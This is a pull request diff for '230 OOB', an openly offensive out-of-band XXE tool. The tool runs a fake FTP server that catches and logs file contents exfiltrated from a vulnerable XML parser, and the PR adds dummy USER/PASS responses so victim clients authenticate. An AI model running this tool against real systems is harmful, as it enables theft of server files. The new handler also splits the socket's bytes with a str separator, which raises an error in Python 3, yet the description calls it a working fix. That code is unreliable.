### PR TITLE
Implement dummy auth

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -45,3 +45,6 @@ $RECYCLE.BIN/
 Network Trash Folder
 Temporary Items
 .apdisk
+
+# Project files
+extracted.log

--- a/230.py
+++ b/230.py
@@ -6,7 +6,7 @@ import argparse
 
 name = """
 =--------------------------------------=
-|  230 OOB || an Out-Of-Band XXE tool  |                          
+|  230 OOB || an Out-Of-Band XXE tool  |
 |    ____  _____  ___   ___  ____      |
 |   (___ \(__  / / _ \ / _ \|  _ \     |
 |     __) ) / / | | | | | | | |_) )    |
@@ -27,7 +27,7 @@ parser = argparse.ArgumentParser(description='An Out-of-Band XXE tool by Corben 
 parser.add_argument('port',type=int,help="Port for the FTP server to listen on (2121 / 21)")
 args = parser.parse_args()
 
-HOST = ''  
+HOST = ''
 PORT = args.port
 
 welcome = b'220 oob-xxe\n'
@@ -36,12 +36,12 @@ get = b'230 more data please!\n'
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
-def main(): 
+def main():
     try:
         s.bind((HOST, PORT))
     except socket.error as msg:
         print('[+] ERROR: Bind failed. ')
-        sys.exit() 
+        sys.exit()
 
     s.listen(10)
     print('[+] 230OOB started on port: '+str(PORT))
@@ -49,15 +49,15 @@ def main():
 
     conn, addr = s.accept()
     print('[*] Connection from: '+addr[0]+"!")
-    conn.sendall(welcome) 
+    conn.sendall(welcome)
 
-    while True:    
+    while True:
         data = conn.recv(1024)
         conn.sendall(get)
         line = data.decode('UTF-8')
         line = line.replace("\n","").replace("CWD","")
-        print(line)     
-        extract(line)     
+        print(line)
+        extract(line)
     s.close()
 
 def extract(data):

--- a/230.py
+++ b/230.py
@@ -31,8 +31,9 @@ HOST = ''
 PORT = args.port
 
 welcome = b'220 oob-xxe\n'
-get = b'230 more data please!\n'
-
+ftp_catch_all_response = b'230 more data please!\n'
+ftp_user_response = b'331 hello world!\n'
+ftp_pass_response = b'230 my password is also hunter2!\n'
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
@@ -53,7 +54,12 @@ def main():
 
     while True:
         data = conn.recv(1024)
-        conn.sendall(get)
+        ftp_command = data.split(" ", 1)
+        response = {
+            'user': ftp_user_response,
+            'pass': ftp_pass_response,
+        }.get(ftp_command[0].lower(), ftp_catch_all_response)
+        conn.sendall(response)
         line = data.decode('UTF-8')
         line = line.replace("\n","").replace("CWD","")
         print(line)


### PR DESCRIPTION
Fixes #1. This PR implements a slightly different response for the `USER` and `PASS` command, which makes sure FTP clients don't fail when they receive an unexpected response when they authenticate. Every username/password combination is accepted by default.

This PR also includes two boy scouts: cleaned up some whitespace and I added the `extracted.log` file to the gitignore list to avoid having an unstaged file when you run the script from the repository.